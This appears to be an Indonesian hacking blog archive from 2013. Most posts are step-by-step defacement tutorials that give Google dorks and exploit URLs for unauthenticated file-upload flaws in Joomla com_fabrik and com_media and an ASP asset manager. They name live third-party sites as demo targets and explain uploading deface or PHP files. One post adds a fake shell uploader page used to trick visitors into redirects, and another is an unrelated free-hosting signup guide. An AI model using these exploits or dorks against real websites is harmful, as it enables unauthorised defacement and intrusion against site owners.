Archive for Mei 2013

Com_Fabrik Exploit

Jumat, 31 Mei 2013
Posted by Unknown
Halo,kembali lagi dengan saya bang vladimir :D
Kali ini saya akan share tentang Exploit Com_Fabrik exploit ini hampir sama dengan exploit sebelumnya yaitu Com_Media Exploit ..


Jadi kita disini mencari web yang akan di tanem Exploitnya dan kita Upload file .HTML ataupun .TXT milik kalian :)
Jadi langsung saja untuk tutorial ikuti caranya dibawah ini :)

1.Cari Dork dengan cara :
 inurl:index.php?option=com_fabrik site:.us
( Kreasikan dork anda dengan mengganti site yang di ingiinkan *Cari saja di google banyak kok :P )

2. Lalu kita cari target untuk di Exploit , Saya akan memberi demo untuk test page .
Sebelum di kasih Exploit :
http://www.weddinginitaly.us/index.php?option=com_fabrik&view=form&fabrik=2&random=0&Itemid=11

3.Lalu disini kita langsung saja masukan Exploit Com_Fabrik nya dengan cara mengganti Text yang berwarna Merah tersebut dengan Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher
( Contoh : http://target.com/index.php?option=com_fabrik&c=import&view=import&filetype=csv&tableid=1echercher )

4. Lalu bila Website tersebut vuln Maka kalian akan masuk ke Uploader CSV , Seperti inilah uploader nya :
5. Upload file .HTML atau .TXT milik kalian , lalu sesudah di upload nanti kalian bisa cek di http://targetmu.com/media/hasilupload.txt // .html dan atau bisa juga upload file .PHP dengan cara metode Tamper Data :)

Tadaaa...Kalian sudah menanam File deface milik kalian..
Sekian untuk tutorial Com_Fabrik Exploit..

Semoga Bermanfaat 
reWrite by Vladimir 

Com_Media Exploit

Rabu, 22 Mei 2013
Posted by Unknown
Haloo bro ,, balik lagi sama gue :D skrg ane mau share tentang com_media exploit :D jadi kita langsung tanam exploit dan upload deh file deface kita (*NOTE : File .txt Only) Ya brooo :D


Dork : inurl:com_media site:my
Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

 Langsung aja kalo dah ketemu targetnya kita tanem exploit nya seperti ini Http://targetmu.my/explottarosini , nanti keluar uploader image .. kita taro deh file deface .txt kita disitu ,, dan tara cek deh di dir IMAGES/Filemu.txt
Semoga bermanfaat ^_^ 
reWrite by Vladimir 
Halo balik lagi sama saya,saya sekarang akan share tenang exploit Insert File .. jadi langsung aja ke tutorial untuk nyoba nya ok :D



Check this out!

Dork : inurl:"/insert_file.php"

Kita langsung saja nyari targetnya gak perlu capek langsung upload .html .txt saja , tidak support .php yaaa inget :D untuk pengecekan lokasi nya.. silahkan klik file setelah di upload :D tadaa gotz hacked :D

Live Target :

Kali ini saya akan share tentang Free Hosting dari bluewhite host , lumayan nih hosting buat ngeceng website sendiri :D biaya perbulan nya ini gratis ko ga pake bayar :D Jadi kita langsung daftar akun > build > share deh web kita ^_^ , nah ini dia untuk spesifikasi Hosting nya :


•20 GB Free Space 
•150GB Free Monthly Bandwidth
 •10 Email Accounts 
•10 Ftp Accounts 
•10 Databases 
•10 Email Lists 
•10 SubDomain 
•10 Parked Domain 
•10 Addon Domain 
•Complete and Real cPanel. 
•Softaculous.

Cukup menarik bukan? Langsung saja deh ikutin step nya kalo pingin dapetin free hosting ^_^

1. Daftar terlebih dahulu di hosting nya , klik disini 
2. Lalu kalian pilih Orderan yang paket nya " Free Hosting Plan " , Klik tombol " Order "
3. Disitu ada pilihan untuk " Domain " atau " Subdomain "
- Untuk yang sudah punya domain tinggal klik menu " Domain " , dan kalau pingin domain gratis klik " Sub Domain .
4. Kalau sudah Pilih paket dan Domain lalu jangan lupa ceklis "
Daftarkan nama anda di kolom yang sudah di sediakan , seperti inilah gambarnya :


(*NOTE : Untuk email di pastikan aktif dan bisa di akses,karena akun cPanel kita akan di kirim ke email kita , dan Telephone kita isikan bebas aja :D )

Kalau sudah mengisi semua data untuk akun kita langsung saja klik tombol " Next Step " , dan setelah itu kita akan di pilih untuk mengisikan domain yang di inginkan (*NOTE : kalau saya pake subdomain aja sih :D ) seperti ini :
7. Setelah itu klik saja " Next Step " , lalu tunggu proses untuk pengecekan dari hosting nya . Bila ada error seperti ini : " Error: Sorry, the password you selected cannot be used because it is too weak and would be too easy to crack. Please select a password with strength rating of 90 or higher. " Berarti harus di " Previuous Step " sampai ke pendaftaran (*NOTE : Gantikan password kalian dengan yang lebih susah dari pada yang sebelum nya katanya supaya tidak bisa di crack :D )

8. dan Kalau sudah berhasil kalian akan mendapatkan suatu notice seperti ini : " Your account has been created!
You may now use the client login bar to see your client area or proceed to your control panel. An email has been dispatched to the address on file. " langsung saja " Next Step " dan cek Email kalian untuk mengaktifasikan supaya web anda bisa di akses ^_^

9.Done Website + Free cPanel anda sudah jadi :D , dan untuk login panel hosting nya DISINI dan untuk mengakses cpanel nya seperti biasa ^_^ http://namadomainanda.bluewhitehosting.com/cpanel atau http://namadomainanda.com/cpanel


Update for NS :
ns1.pixels-hosts.co.uk 
ns2.pixels-hosts.co.uk
 
Enjoy ;)


Semoga bermanfaat,
by Vladimir

SOCENG Visitor

Jumat, 10 Mei 2013
Posted by Unknown


Kali ini saya akan share tentang SOCENG Visitor , jadi trik ini adalah dimana kita akan di kasih seperti Upload Shell ( Defacer pasti seneng dong kalo nemu Shell :P ) nah disini kita akan menipu dengan trik ini sehingga kita akan ng-redirect ke Web yang akan di naikan Visitornya :P

Contoh nya seperti ini :


Kalo kalian klik Tombol " Upload File's " Kita akan ng-redirect ke index web itu . Nah seperti itulah trik SOCENG dari saya :P dan jika ingin mengambil scriptnya bisa lihat coding di bawah ini :

<!-- Freaks404 A.k.a Vladimir Coding Simple :P -->
<body>
<title> FrZUpL0ad3R </title>
<form action ="/index.html" metode="post" enctype="multipart/form-data">
<label for="file"> Filename (allowed .php , .html , .asp ): </label>
<input type="file" name="file" id="file" />
<br />
    <button type="submit">Upload File's</button>
</form>
</form>
</body>

Nah simpan Coding script ini Dengan Ekstensi .PHP ( Kalo .html entar masa uploader .HTML :ngakak ) disini ada beberapa jenis yang harus di genti seperti :

Merah : Ini terserah namanya mau apa yang jelas ini Title nya :P
Hijau : Nah disini yang harus di genti dengan baik,kita arahkan ini dengan nama Domain yang akan kalian tambahkan visitornya (*EX : http://namawebsitemu.com )
Biru : Nah disitu deskripsi untuk Uploader yang mungkin emang pengen kalian genti 


Sekian tutorial yang saya kasih,
Semoga bermanfaat

Wordpress Remote File Uploadify

Kamis, 02 Mei 2013
Posted by Unknown
Tag :

Hallo selamat malam,saya akan share tentang Exploit baru lagi nih , yaitu Wordpress Remote File Uploadify ... jadi trik ini simpel ko kita tinggal cari target dan langsung upload deh .html kita ;)
So , lets go for this Tutorial !

Dork :
inurl:Editor/assetmanager/assetmanager.asp

Seperti inilah ketika kita sudah masuk ke Uploader nya :


*Text yang berwarna kuning itu lah File .HTML punya saya , dan di sebelah kiri di textbox itu adalah path dari dimana lokasi file kita :)

Cara nya adalah :

1. Cari target Dari Dork yang sudah di tentukan
2. Lalu kalau sudah ketemu klik tombol " Browser " , dan cari file .HTML kalian
3. Lalu klik tombol " Upload "
4. Dan tada cek Textbox diatas tombol " Upload " Copykan seperti ini
http://targetyangsudahditemukan.com/isi-dari-textbox-di-atas-uploader
5. Tada,,done deh sudah di upload file .HTML kalian :)





Dan ini adalah Live Demo untuk testing :

http://egypt-hosts.com/Editor/assetmanager/assetmanager.asp
http://www.easyblog.dk/editor/Assetmanager/assetmanager.asp?lang=danish&name=Min+Folder&path=%2Fusers%2FvDavidsenvV%2F

Sekian,
semoga Bermanfaat

Blogger templates

Welcome to My Blog

Popular Post

Blogger templates

Followers

Copyright © Vladimir Penetration Labs 2013. Diberdayakan oleh Blogger.

- Copyright © :: Vladimir Penetration Labs :: -Robotic Notes- Powered by Blogger - Designed by Johanes Djogan -